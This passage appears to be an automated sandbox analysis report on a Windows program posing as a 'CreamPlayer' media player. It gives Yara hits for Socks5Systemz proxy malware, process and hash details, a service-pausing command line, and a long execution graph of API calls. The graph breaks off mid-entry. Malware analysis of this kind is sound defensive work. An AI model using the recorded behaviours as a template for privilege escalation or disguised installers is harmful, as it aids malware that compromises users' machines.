                                                                                                  MD5 hash:A3E56DEA396FF196EFE4C3E60B998E88
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1369381246.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:6
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\net1 pause cream_player_12135
                                                                                                  Imagebase:0x9f0000
                                                                                                  File size:139'776 bytes
                                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:21.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.4%
                                                                                                    Total number of Nodes:1520
                                                                                                    Total number of Limit Nodes:22
                                                                                                    execution_graph 5448 407548 5449 407554 CloseHandle 5448->5449 5450 40755d 5448->5450 5449->5450 6685 402b48 RaiseException 5890 407749 5891 4076dc WriteFile 5890->5891 5896 407724 5890->5896 5892 4076e8 5891->5892 5893 4076ef 5891->5893 5894 40748c 35 API calls 5892->5894 5895 407700 5893->5895 5897 4073ec 34 API calls 5893->5897 5894->5893 5896->5890 5898 4077e0 5896->5898 5897->5895 5899 4078db InterlockedExchange 5898->5899 5901 407890 5898->5901 5900 4078e7 5899->5900 6686 40294a 6689 402952 6686->6689 6687 402967 6688 403554 4 API calls 6688->6689 6689->6687 6689->6688 6690 403f4a 6691 403f53 6690->6691 6692 403f5c 6690->6692 6694 403f07 6691->6694 6697 403f09 6694->6697 6696 403f3c 6696->6692 6698 403154 4 API calls 6697->6698 6700 403e9c 6697->6700 6703 403f3d 6697->6703 6717 403e9c 6697->6717 6698->6697 6699 403ef2 6702 402674 4 API calls 6699->6702 6700->6696 6700->6699 6706 403ea9 6700->6706 6708 403e8e 6700->6708 6705 403ecf 6702->6705 6703->6692 6705->6692 6706->6705 6707 402674 4 API calls 6706->6707 6707->6705 6710 403e4c 6708->6710 6709 403e67 6715 403e78 6709->6715 6716 402674 4 API calls 6709->6716 6710->6709 6711 403e62 6710->6711 6712 403e7b 6710->6712 6714 403cc8 4 API calls 6711->6714 6713 402674 4 API calls 6712->6713 6713->6715 6714->6709 6715->6699 6715->6706 6716->6715 6718 403ed7 6717->6718 6724 403ea9 6717->6724 6719 403ef2 6718->6719 6721 403e8e 4 API calls 6718->6721 6722 402674 4 API calls 6719->6722 6720 403ecf 6720->6697 6723 403ee6 6721->6723 6722->6720 6723->6719 6723->6724 6724->6720 6725 402674 4 API calls 6724->6725 6725->6720 6244 40ac4f 6245 40abc1 6244->6245 6246 4094d8 9 API calls 6245->6246 6248 40abed 6245->6248 6246->6248 6247 40ac06 6249 40ac1a 6247->6249 6250 40ac0f DestroyWindow 6247->6250 6248->6247 6251 40ac00 RemoveDirectoryA 6248->6251 6252 40ac42 6249->6252 6253 40357c 4 API calls 6249->6253 6250->6249 6251->6247 6254 40ac38 6253->6254 6255 4025ac 4 API calls 6254->6255 6255->6252 6256 403a52 6257 403a74 6256->6257 6258 403a5a WriteFile 6256->6258 6258->6257 6259 403a78 GetLastError 6258->6259 6259->6257 6260 402654 6261 403154 4 API calls 6260->6261 6262 402614 6261->6262 6263 402632 6262->6263 6264 403154 4 API calls 6262->6264 6264->6263 6265 40ac56 6266 40ac5d 6265->6266 6268 40ac88 6265->6268 6275 409448 6266->6275 6270 403198 4 API calls 6268->6270 6269 40ac62 6269->6268 6272 40ac80 MessageBoxA 6269->6272 6271 40acc0 6270->6271 6273 403198 4 API calls 6271->6273 6272->6268 6274 40acc8 6273->6274 6276 409454 GetCurrentProcess OpenProcessToken 6275->6276 6277 4094af ExitWindowsEx 6275->6277 6278 409466 6276->6278 6279 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6276->6279 6277->6278 6278->6269 6279->6277 6279->6278 6734 40995e 6735 409960 6734->6735 6736 40999e CallWindowProcA 6735->6736 6737 409982 6735->6737 6736->6737 6738 409960 6739 409982 6738->6739 6741 40996f 6738->6741 6740 40999e CallWindowProcA 6740->6739 6741->6739 6741->6740 6742 405160 6743 405173 6742->6743 6744 404e58 33 API calls 6743->6744 6745 405187 6744->6745 6280 402e64 6281 402e69 6280->6281 6282 402e7a RtlUnwind 6281->6282 6283 402e5e 6281->6283 6284 402e9d 6282->6284 5902 40766c SetFilePointer 5903 4076a3 5902->5903 5904 407693 GetLastError 5902->5904 5904->5903 5905 40769c 5904->5905 5906 40748c 35 API calls 5905->5906 5906->5903 6297 40667c IsDBCSLeadByte 6298 406694 6297->6298 6758 403f7d 6759 403fa2 6758->6759 6761 403f84 6758->6761 6759->6761 6762 403e8e 4 API calls 6759->6762 6760 403f8c 6761->6760 6763 402674 4 API calls 6761->6763 6762->6761 6764 403fca 6763->6764 6765 403d02 6767 403d12 6765->6767 6766 403ddf ExitProcess 6767->6766 6768 403db8 6767->6768 6770 403dea 6767->6770 6775 403da4 6767->6775 6776 403d8f MessageBoxA 6767->6776 6769 403cc8 4 API calls 6768->6769 6771 403dc2 6769->6771 6772 403cc8 4 API calls 6771->6772 6773 403dcc 6772->6773 6785 4019dc 6773->6785 6781 403fe4 6775->6781 6776->6768 6777 403dd1 6777->6766 6777->6770 6782 403fe8 6781->6782 6783 403f07 4 API calls 6782->6783 6784 404006 6783->6784 6786 401abb 6785->6786 6787 4019ed 6785->6787 6786->6777 6788 401a04 RtlEnterCriticalSection 6787->6788 6789 401a0e LocalFree 6787->6789 6788->6789 6790 401a41 6789->6790 6791 401a2f VirtualFree 6790->6791 6792 401a49 6790->6792 6791->6790 6793 401a70 LocalFree 6792->6793 6794 401a87 6792->6794 6793->6793 6793->6794 6795 401aa9 RtlDeleteCriticalSection 6794->6795 6796 401a9f RtlLeaveCriticalSection 6794->6796 6795->6777 6796->6795 6303 404206 6304 4041cc 6303->6304 6307 40420a 6303->6307 6305 404282 6306 403154 4 API calls 6308 404323 6306->6308 6307->6305 6307->6306 6309 402c08 6310 402c82 6309->6310 6313 402c19 6309->6313 6311 402c56 RtlUnwind 6312 403154 4 API calls 6311->6312 6312->6310 6313->6310 6313->6311 6316 402b28 6313->6316 6317 402b31 RaiseException 6316->6317 6318 402b47 6316->6318 6317->6318 6318->6311 6319 408c10 6320 408c17 6319->6320 6321 403198 4 API calls 6320->6321 6329 408cb1 6321->6329 6322 408cdc 6323 4031b8 4 API calls 6322->6323 6324 408d69 6323->6324 6325 408cc8 6327 4032fc 18 API calls 6325->6327 6326 403278 18 API calls 6326->6329 6327->6322 6328 4032fc 18 API calls 6328->6329 6329->6322 6329->6325 6329->6326 6329->6328 6334 40a814 6335 40a839 6334->6335 6336 40993c 29 API calls 6335->6336 6339 40a83e 6336->6339 6337 40a891 6368 4026c4 GetSystemTime 6337->6368 6339->6337 6342 408dd8 18 API calls 6339->6342 6340 40a896 6341 409330 46 API calls 6340->6341 6343 40a89e 6341->6343 6344 40a86d 6342->6344 6345 4031e8 18 API calls 6343->6345 6348 40a875 MessageBoxA 6344->6348 6346 40a8ab 6345->6346 6347 406928 19 API calls 6346->6347 6349 40a8b8 6347->6349 6348->6337 6350 40a882 6348->6350 6351 4066c0 19 API calls 6349->6351 6352 405864 19 API calls 6350->6352 6353 40a8c8 6351->6353 6352->6337 6354 406638 19 API calls 6353->6354 6355 40a8d9 6354->6355 6356 403340 18 API calls 6355->6356 6357 40a8e7 6356->6357 6358 4031e8 18 API calls 6357->6358 6359 40a8f7 6358->6359 6360 4074e0 37 API calls 6359->6360 6361 40a936 6360->6361 6362 402594 18 API calls 6361->6362 6363 40a956 6362->6363 6364 407a28 19 API calls 6363->6364 6365 40a998 6364->6365 6366 407cb8 35 API calls 6365->6366 6367 40a9bf 6366->6367 6368->6340 5446 407017 5447 407008 SetErrorMode 5446->5447 6369 403018 6370 403070 6369->6370 6371 403025 6369->6371 6372 40302a RtlUnwind 6371->6372 6373 40304e 6372->6373 6375 402f78 6373->6375 6376 402be8 6373->6376 6377 402bf1 RaiseException 6376->6377 6378 402c04 6376->6378 6377->6378 6378->6370 6383 40901e 6384 409010 6383->6384 6385 408fac Wow64RevertWow64FsRedirection 6384->6385 6386 409018 6385->6386 6387 409020 SetLastError 6388 409029 6387->6388 6403 403a28 ReadFile 6404 403a46 6403->6404 6405 403a49 GetLastError 6403->6405 5907 40762c ReadFile 5908 407663 5907->5908 5909 40764c 5907->5909 5910 407652 GetLastError 5909->5910 5911 40765c 5909->5911 5910->5908 5910->5911 5912 40748c 35 API calls 5911->5912 5912->5908 6807 40712e 6808 407118 6807->6808 6809 403198 4 API calls 6808->6809 6810 407120 6809->6810 6811 403198 4 API calls 6810->6811 6812 407128 6811->6812 5927 40a82f 5928 409ae8 18 API calls 5927->5928 5929 40a834 5928->5929 5930 40a839 5929->5930 5931 402f24 5 API calls 5929->5931 5964 40993c 5930->5964 5931->5930 5933 40a891 5969 4026c4 GetSystemTime 5933->5969 5935 40a83e 5935->5933 6030 408dd8 5935->6030 5936 40a896 5970 409330 5936->5970 5940 40a86d 5944 40a875 MessageBoxA 5940->5944 5941 4031e8 18 API calls 5942 40a8ab 5941->5942 5988 406928 5942->5988 5944->5933 5946 40a882 5944->5946 6033 405864 5946->6033 5951 40a8d9 6015 403340 5951->6015 5953 40a8e7 5954 4031e8 18 API calls 5953->5954 5955 40a8f7 5954->5955 5956 4074e0 37 API calls 5955->5956 5957 40a936 5956->5957 5958 402594 18 API calls 5957->5958 5959 40a956 5958->5959 5960 407a28 19 API calls 5959->5960 5961 40a998 5960->5961 5962 407cb8 35 API calls 5961->5962 5963 40a9bf 5962->5963 6037 40953c 5964->6037 5967 4098cc 19 API calls 5968 40995c 5967->5968 5968->5935 5969->5936 5977 409350 5970->5977 5973 409375 CreateDirectoryA 5974 4093ed 5973->5974 5975 40937f GetLastError 5973->5975 5976 40322c 4 API calls 5974->5976 5975->5977 5978 4093f7 5976->5978 5977->5973 5979 408dd8 18 API calls 5977->5979 5980 404c94 33 API calls 5977->5980 5983 407284 19 API calls 5977->5983 5986 408da8 18 API calls 5977->5986 5987 405890 18 API calls 5977->5987 6093 406cf4 5977->6093 6116 409224 5977->6116 5981 4031b8 4 API calls 5978->5981 5979->5977 5980->5977 5982 409411 5981->5982 5984 4031b8 4 API calls 5982->5984 5983->5977 5985 40941e 5984->5985 5985->5941 5986->5977 5987->5977 6222 406820 5988->6222 5991 403454 18 API calls 5992 40694a 5991->5992 5993 4066c0 5992->5993 6227 4068e4 5993->6227 5996 4066f0 5998 403340 18 API calls 5996->5998 5997 4066fe 5999 403454 18 API calls 5997->5999 6000 4066fc 5998->6000 6001 406711 5999->6001 6003 403198 4 API calls 6000->6003 6002 403340 18 API calls 6001->6002 6002->6000 6004 406733 6003->6004 6005 406638 6004->6005 6006 406642 6005->6006 6007 406665 6005->6007 6233 406950 6006->6233 6009 40322c 4 API calls 6007->6009 6011 40666e 6009->6011 6010 406649 6010->6007 6012 406654 6010->6012 6011->5951 6013 403340 18 API calls 6012->6013 6014 406662 6013->6014 6014->5951 6016 403344 6015->6016 6017 4033a5 6015->6017 6018 4031e8 6016->6018 6019 40334c 6016->6019 6023 403254 18 API calls 6018->6023 6025 4031fc 6018->6025 6019->6017 6021 40335b 6019->6021 6024 4031e8 18 API calls 6019->6024 6020 403228 6020->5953 6022 403254 18 API calls 6021->6022 6027 403375 6022->6027 6023->6025 6024->6021 6025->6020 6026 4025ac 4 API calls 6025->6026 6026->6020 6028 4031e8 18 API calls 6027->6028 6029 4033a1 6028->6029 6029->5953 6031 408da8 18 API calls 6030->6031 6032 408df4 6031->6032 6032->5940 6034 405869 6033->6034 6035 405940 19 API calls 6034->6035 6036 40587b 6035->6036 6036->6036 6044 40955b 6037->6044 6038 409590 6040 40959d GetUserDefaultLangID 6038->6040 6045 409592 6038->6045 6039 409594 6049 407024 GetModuleHandleA GetProcAddress 6039->6049 6040->6045 6043 40956f 6043->5967 6044->6038 6044->6039 6044->6043 6045->6043 6046 4095cb GetACP 6045->6046 6047 4095ef 6045->6047 6046->6043 6046->6045 6047->6043 6048 409615 GetACP 6047->6048 6048->6043 6048->6047 6050 407067 6049->6050 6051 40705e 6049->6051 6052 407070 6050->6052 6053 4070a8 6050->6053 6060 403198 4 API calls 6051->6060 6070 406f68 6052->6070 6054 406f68 RegOpenKeyExA 6053->6054 6058 4070c1 6054->6058 6056 407089 6057 4070de 6056->6057 6073 406f5c 6056->6073 6062 40322c 4 API calls 6057->6062 6058->6057 6061 406f5c 20 API calls 6058->6061 6064 407120 6060->6064 6065 4070d5 RegCloseKey 6061->6065 6066 4070eb 6062->6066 6067 403198 4 API calls 6064->6067 6065->6057 6068 4032fc 18 API calls 6066->6068 6069 407128 6067->6069 6068->6051 6069->6045 6071 406f73 6070->6071 6072 406f79 RegOpenKeyExA 6070->6072 6071->6072 6072->6056 6076 406e10 6073->6076 6077 406e36 RegQueryValueExA 6076->6077 6078 406e59 6077->6078 6083 406e7b 6077->6083 6079 406e73 6078->6079 6078->6083 6084 403278 18 API calls 6078->6084 6085 403420 18 API calls 6078->6085 6081 403198 4 API calls 6079->6081 6080 403198 4 API calls 6082 406f47 RegCloseKey 6080->6082 6081->6083 6082->6057 6083->6080 6084->6078 6086 406eb0 RegQueryValueExA 6085->6086 6086->6077 6087 406ecc 6086->6087 6087->6083 6088 4034f0 18 API calls 6087->6088 6089 406f0e 6088->6089 6090 406f20 6089->6090 6092 403420 18 API calls 6089->6092 6091 4031e8 18 API calls 6090->6091 6091->6083 6092->6090 6135 406a58 6093->6135 6097 406a58 19 API calls 6099 406d36 6097->6099 6098 406d26 6098->6097 6100 406d72 6098->6100 6101 406d42 6099->6101 6103 406a34 21 API calls 6099->6103 6143 406888 6100->6143 6101->6100 6104 406d67 6101->6104 6107 406a58 19 API calls 6101->6107 6103->6101 6104->6100 6155 406cc8 GetWindowsDirectoryA 6104->6155 6108 406d5b 6107->6108 6108->6104 6111 406a34 21 API calls 6108->6111 6109 406638 19 API calls 6110 406d87 6109->6110 6112 40322c 4 API calls 6110->6112 6111->6104 6113 406d91 6112->6113 6114 4031b8 4 API calls 6113->6114 6115 406dab 6114->6115 6115->5977 6117 409244 6116->6117 6118 406638 19 API calls 6117->6118 6119 40925d 6118->6119 6120 40322c 4 API calls 6119->6120 6127 409268 6120->6127 6121 406978 20 API calls 6121->6127 6123 408dd8 18 API calls 6123->6127 6124 4033b4 18 API calls 6124->6127 6125 405890 18 API calls 6125->6127 6127->6121 6127->6123 6127->6124 6127->6125 6128 4092e4 6127->6128 6195 4091b0 6127->6195 6203 409034 6127->6203 6129 40322c 4 API calls 6128->6129 6130 4092ef 6129->6130 6131 4031b8 4 API calls 6130->6131 6132 409309 6131->6132 6133 403198 4 API calls 6132->6133 6134 409311 6133->6134 6134->5977 6136 4034f0 18 API calls 6135->6136 6137 406a6b 6136->6137 6138 406a82 GetEnvironmentVariableA 6137->6138 6142 406a95 6137->6142 6157 406dec 6137->6157 6138->6137 6139 406a8e 6138->6139 6141 403198 4 API calls 6139->6141 6141->6142 6142->6098 6152 406a34 6142->6152 6144 403414 6143->6144 6145 4068ab GetFullPathNameA 6144->6145 6146 4068b7 6145->6146 6147 4068ce 6145->6147 6146->6147 6149 4068bf 6146->6149 6148 40322c 4 API calls 6147->6148 6150 4068cc 6148->6150 6151 403278 18 API calls 6149->6151 6150->6109 6151->6150 6161 4069dc 6152->6161 6156 406ce9 6155->6156 6156->6100 6158 406dfa 6157->6158 6159 4034f0 18 API calls 6158->6159 6160 406e08 6159->6160 6160->6137 6168 406978 6161->6168 6163 4069fe 6164 406a06 GetFileAttributesA 6163->6164 6165 406a1b 6164->6165 6166 403198 4 API calls 6165->6166 6167 406a23 6166->6167 6167->6098 6178 406744 6168->6178 6170 4069b0 6173 4069c6 6170->6173 6174 4069bb 6170->6174 6172 406989 6172->6170 6185 406970 CharPrevA 6172->6185 6186 403454 6173->6186 6175 40322c 4 API calls 6174->6175 6177 4069c4 6175->6177 6177->6163 6181 406755 6178->6181 6179 4067b9 6180 406680 IsDBCSLeadByte 6179->6180 6182 4067b4 6179->6182 6180->6182 6181->6179 6184 406773 6181->6184 6182->6172 6184->6182 6193 406680 IsDBCSLeadByte 6184->6193 6185->6172 6187 403486 6186->6187 6188 403459 6186->6188 6189 403198 4 API calls 6187->6189 6188->6187 6191 40346d 6188->6191 6190 40347c 6189->6190 6190->6177 6192 403278 18 API calls 6191->6192 6192->6190 6194 406694 6193->6194 6194->6184 6196 403198 4 API calls 6195->6196 6198 4091d1 6196->6198 6200 4091fe 6198->6200 6212 4032a8 6198->6212 6215 403494 6198->6215 6201 403198 4 API calls 6200->6201 6202 409213 6201->6202 6202->6127 6204 408f70 2 API calls 6203->6204 6205 40904a 6204->6205 6206 40904e 6205->6206 6219 406a48 6205->6219 6206->6127 6209 409081 6210 408fac Wow64RevertWow64FsRedirection 6209->6210 6211 409089 6210->6211 6211->6127 6213 403278 18 API calls 6212->6213 6214 4032b5 6213->6214 6214->6198 6216 403498 6215->6216 6218 4034c3 6215->6218 6217 4034f0 18 API calls 6216->6217 6217->6218 6218->6198 6220 4069dc 21 API calls 6219->6220 6221 406a52 GetLastError 6220->6221 6221->6209 6223 406744 IsDBCSLeadByte 6222->6223 6225 406835 6223->6225 6224 40687f 6224->5991 6225->6224 6226 406680 IsDBCSLeadByte 6225->6226 6226->6225 6228 4068f3 6227->6228 6229 406820 IsDBCSLeadByte 6228->6229 6231 4068fe 6229->6231 6230 4066ea 6230->5996 6230->5997 6231->6230 6232 406680 IsDBCSLeadByte 6231->6232 6232->6231 6234 406957 6233->6234 6235 40695b 6233->6235 6234->6010 6238 406970 CharPrevA 6235->6238 6237 40696c 6237->6010 6238->6237 6813 408f30 6816 408dfc 6813->6816 6817 408e05 6816->6817 6818 403198 4 API calls 6817->6818 6819 408e13 6817->6819 6818->6817 6820 403932 6821 403924 6820->6821 6822 40374c VariantClear 6821->6822 6823 40392c 6822->6823 5383 4075c4 SetFilePointer 5384 4075f7 5383->5384 5385 4075e7 GetLastError 5383->5385 5385->5384 5386 4075f0 5385->5386 5388 40748c GetLastError 5386->5388 5391 4073ec 5388->5391 5392 407284 19 API calls 5391->5392 5393 407414 5392->5393 5394 407434 5393->5394 5395 405194 33 API calls 5393->5395 5396 405890 18 API calls 5394->5396 5395->5394 5397 407443 5396->5397 5398 403198 4 API calls 5397->5398 5399 407460 5398->5399 5399->5384 6414 4076c8 WriteFile 6415 4076e8 6414->6415 6416 4076ef 6414->6416 6417 40748c 35 API calls 6415->6417 6418 407700 6416->6418 6419 4073ec 34 API calls 6416->6419 6417->6416 6419->6418 6420 402ccc 6423 402cfe 6420->6423 6424 402cdd 6420->6424 6421 402d88 RtlUnwind 6422 403154 4 API calls 6421->6422 6422->6423 6424->6421 6424->6423 6425 402b28 RaiseException 6424->6425 6426 402d7f 6425->6426 6426->6421 6832 403fcd 6833 403f07 4 API calls 6832->6833 6834 403fd6 6833->6834 6835 403e9c 4 API calls 6834->6835 6836 403fe2 6835->6836 6433 4024d0 6434 4024e4 6433->6434 6435 4024e9 6433->6435 6438 401918 4 API calls 6434->6438 6436 402518 6435->6436 6437 40250e RtlEnterCriticalSection 6435->6437 6440 4024ed 6435->6440 6448 402300 6436->6448 6437->6436 6438->6435 6441 402525 6444 402581 6441->6444 6445 402577 RtlLeaveCriticalSection 6441->6445 6443 401fd4 14 API calls 6446 402531 6443->6446 6445->6444 6446->6441 6447 40215c 9 API calls 6446->6447 6447->6441 6449 402314 6448->6449 6451 402335 6449->6451 6452 4023b8 6449->6452 6450 402344 6450->6441 6450->6443 6451->6450 6454 401b74 9 API calls 6451->6454 6452->6450 6453 401d80 9 API calls 6452->6453 6456 402455 6452->6456 6458 401e84 6452->6458 6453->6452 6454->6450 6456->6450 6457 401d00 9 API calls 6456->6457 6457->6450 6463 401768 6458->6463 6460 401e99 6461 401ea6 6460->6461 6462 401dcc 9 API calls 6460->6462 6461->6452 6462->6461 6464 401787 6463->6464 6465 40183b 6464->6465 6466 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6464->6466 6467 40132c LocalAlloc 6464->6467 6469 401821 6464->6469 6471 4017d6 6464->6471 6468 4015c4 VirtualAlloc 6465->6468 6472 4017e7 6465->6472 6466->6464 6467->6464 6468->6472 6470 40150c VirtualFree 6469->6470 6470->6472 6473 40150c VirtualFree 6471->6473 6472->6460 6473->6472 6474 4028d2 6475 4028da 6474->6475 6476 403554 4 API calls 6475->6476 6477 4028ef 6475->6477 6476->6475 6478 4025ac 4 API calls 6477->6478 6479 4028f4 6478->6479 6837 4019d3 6838 4019ba 6837->6838 6839 4019c3 RtlLeaveCriticalSection 6838->6839 6840 4019cd 6838->6840 6839->6840 5400 407fd4 5401 407fe6 5400->5401 5403 407fed 5400->5403 5411 407f10 5401->5411 5405 408015 5403->5405 5406 408017 5403->5406 5409 408021 5403->5409 5404 40804e 5425 407e2c 5405->5425 5422 407d7c 5406->5422 5408 407d7c 33 API calls 5408->5404 5409->5404 5409->5408 5412 407f25 5411->5412 5413 407d7c 33 API calls 5412->5413 5414 407f34 5412->5414 5413->5414 5415 407f6e 5414->5415 5416 407d7c 33 API calls 5414->5416 5417 407f82 5415->5417 5418 407d7c 33 API calls 5415->5418 5416->5415 5421 407fae 5417->5421 5432 407eb8 5417->5432 5418->5417 5421->5403 5435 4058c4 5422->5435 5424 407d9e 5424->5409 5426 405194 33 API calls 5425->5426 5427 407e57 5426->5427 5443 407de4 5427->5443 5429 407e5f 5430 403198 4 API calls 5429->5430 5431 407e74 5430->5431 5431->5409 5433 407ec7 VirtualFree 5432->5433 5434 407ed9 VirtualAlloc 5432->5434 5433->5434 5434->5421 5437 4058d0 5435->5437 5436 405194 33 API calls 5438 4058fd 5436->5438 5437->5436 5439 4031e8 18 API calls 5438->5439 5440 405908 5439->5440 5441 403198 4 API calls 5440->5441 5442 40591d 5441->5442 5442->5424 5444 4058c4 33 API calls 5443->5444 5445 407e06 5444->5445 5445->5429 6480 405ad4 6481 405ae4 6480->6481 6482 405adc 6480->6482 6483 405ae2 6482->6483 6484 405aeb 6482->6484 6487 405a4c 6483->6487 6485 405940 19 API calls 6484->6485 6485->6481 6488 405a54 6487->6488 6489 405a6e 6488->6489 6492 403154 4 API calls 6488->6492 6490 405a73 6489->6490 6491 405a8a 6489->6491 6493 405940 19 API calls 6490->6493 6494 403154 4 API calls 6491->6494 6492->6488 6495 405a86 6493->6495 6496 405a8f 6494->6496 6498 403154 4 API calls 6495->6498 6497 4059b0 33 API calls 6496->6497 6497->6495 6499 405ab8 6498->6499 6500 403154 4 API calls 6499->6500 6501 405ac6 6500->6501 6501->6481 5913 40a9de 5914 40aa03 5913->5914 5915 407918 InterlockedExchange 5914->5915 5916 40aa2d 5915->5916 5917 40aa3d 5916->5917 5918 409ae8 18 API calls 5916->5918 5923 4076ac SetEndOfFile 5917->5923 5918->5917 5920 40aa59 5921 4025ac 4 API calls 5920->5921 5922 40aa90 5921->5922 5924 4076c3 5923->5924 5925 4076bc 5923->5925 5924->5920 5926 40748c 35 API calls 5925->5926 5926->5924 6844 402be9 RaiseException 6845 402c04 6844->6845 6512 402af2 6513 402afe 6512->6513 6516 402ed0 6513->6516 6517 403154 4 API calls 6516->6517 6519 402ee0 6517->6519 6518 402b03 6519->6518 6521 402b0c 6519->6521 6522 402b25 6521->6522 6523 402b15 RaiseException 6521->6523 6522->6518 6523->6522 5451 40a5f8 5494 4030dc 5451->5494 5453 40a60e 5497 4042e8 5453->5497 5455 40a613 5500 40457c GetModuleHandleA GetProcAddress 5455->5500 5459 40a61d 5508 4065c8 5459->5508 5461 40a622 5517 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5461->5517 5470 40a665 5539 406c2c 5470->5539 5472 4031e8 18 API calls 5473 40a683 5472->5473 5553 4074e0 5473->5553 5479 407918 InterlockedExchange 5481 40a6d2 5479->5481 5480 40a710 5573 4074a0 5480->5573 5481->5480 5610 409ae8 5481->5610 5483 40a751 5577 407a28 5483->5577 5484 40a736 5484->5483 5486 409ae8 18 API calls 5484->5486 5486->5483 5487 40a776 5587 408b08 5487->5587 5491 40a7bc 5492 408b08 35 API calls 5491->5492 5493 40a7f5 5491->5493 5492->5491 5620 403094 5494->5620 5496 4030e1 GetModuleHandleA GetCommandLineA 5496->5453 5498 403154 4 API calls 5497->5498 5499 404323 5497->5499 5498->5499 5499->5455 5501 404598 5500->5501 5502 40459f GetProcAddress 5500->5502 5501->5502 5503 4045b5 GetProcAddress 5502->5503 5504 4045ae 5502->5504 5505 4045c4 SetProcessDEPPolicy 5503->5505 5506 4045c8 5503->5506 5504->5503 5505->5506 5507 404624 6FB81CD0 5506->5507 5507->5459 5621 405ca8 5508->5621 5518 4090f7 5517->5518 5705 406fa0 SetErrorMode 5518->5705 5521 407284 19 API calls 5522 409127 5521->5522 5523 403198 4 API calls 5522->5523 5524 40913c 5523->5524 5525 409b78 GetSystemInfo VirtualQuery 5524->5525 5526 409ba2 5525->5526 5527 409c2c 5525->5527 5526->5527 5528 409c0d VirtualQuery 5526->5528 5529 409bcc VirtualProtect 5526->5529 5530 409bfb VirtualProtect 5526->5530 5531 409768 5527->5531 5528->5526 5528->5527 5529->5526 5530->5528 5711 406bd0 GetCommandLineA 5531->5711 5533 409850 5534 4031b8 4 API calls 5533->5534 5536 40986a 5534->5536 5535 406c2c 20 API calls 5538 409785 5535->5538 5536->5470 5603 409c88 5536->5603 5537 403454 18 API calls 5537->5538 5538->5533 5538->5535 5538->5537 5540 406c53 GetModuleFileNameA 5539->5540 5541 406c77 GetCommandLineA 5539->5541 5542 403278 18 API calls 5540->5542 5549 406c7c 5541->5549 5543 406c75 5542->5543 5547 406ca4 5543->5547 5544 406c81 5545 403198 4 API calls 5544->5545 5548 406c89 5545->5548 5546 406af0 18 API calls 5546->5549 5550 403198 4 API calls 5547->5550 5551 40322c 4 API calls 5548->5551 5549->5544 5549->5546 5549->5548 5552 406cb9 5550->5552 5551->5547 5552->5472 5554 4074ea 5553->5554 5718 407576 5554->5718 5721 407578 5554->5721 5555 407516 5556 40752a 5555->5556 5557 40748c 35 API calls 5555->5557 5560 409c34 FindResourceA 5556->5560 5557->5556 5561 409c49 5560->5561 5562 409c4e SizeofResource 5560->5562 5563 409ae8 18 API calls 5561->5563 5564 409c60 LoadResource 5562->5564 5565 409c5b 5562->5565 5563->5562 5567 409c73 LockResource 5564->5567 5568 409c6e 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5570 409c84 5567->5570 5571 409c7f 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5570->5479 5570->5481 5572 409ae8 18 API calls 5571->5572 5572->5570 5574 4074b4 5573->5574 5575 4074c4 5574->5575 5576 4073ec 34 API calls 5574->5576 5575->5484 5576->5575 5578 407a35 5577->5578 5579 405890 18 API calls 5578->5579 5580 407a89 5578->5580 5579->5580 5581 407918 InterlockedExchange 5580->5581 5582 407a9b 5581->5582 5583 405890 18 API calls 5582->5583 5584 407ab1 5582->5584 5583->5584 5585 405890 18 API calls 5584->5585 5586 407af4 5584->5586 5585->5586 5586->5487 5591 408b82 5587->5591 5598 408b39 5587->5598 5588 408bcd 5724 407cb8 5588->5724 5590 408be4 5594 4031b8 4 API calls 5590->5594 5591->5588 5593 4034f0 18 API calls 5591->5593 5599 4031e8 18 API calls 5591->5599 5600 403420 18 API calls 5591->5600 5602 407cb8 35 API calls 5591->5602 5592 4034f0 18 API calls 5592->5598 5593->5591 5597 408bfe 5594->5597 5595 403420 18 API calls 5595->5598 5596 4031e8 18 API calls 5596->5598 5617 404c20 5597->5617 5598->5591 5598->5592 5598->5595 5598->5596 5601 407cb8 35 API calls 5598->5601 5599->5591 5600->5591 5601->5598 5602->5591 5604 40322c 4 API calls 5603->5604 5605 409cab 5604->5605 5606 409cba MessageBoxA 5605->5606 5607 409ccf 5606->5607 5608 403198 4 API calls 5607->5608 5609 409cd7 5608->5609 5609->5470 5611 409af1 5610->5611 5612 409b09 5610->5612 5613 405890 18 API calls 5611->5613 5614 405890 18 API calls 5612->5614 5616 409b03 5613->5616 5615 409b1a 5614->5615 5615->5480 5616->5480 5746 402594 5617->5746 5619 404c2b 5619->5491 5620->5496 5622 405940 19 API calls 5621->5622 5623 405cb9 5622->5623 5624 405280 GetSystemDefaultLCID 5623->5624 5628 4052b6 5624->5628 5625 404cdc 19 API calls 5625->5628 5626 40520c 19 API calls 5626->5628 5627 4031e8 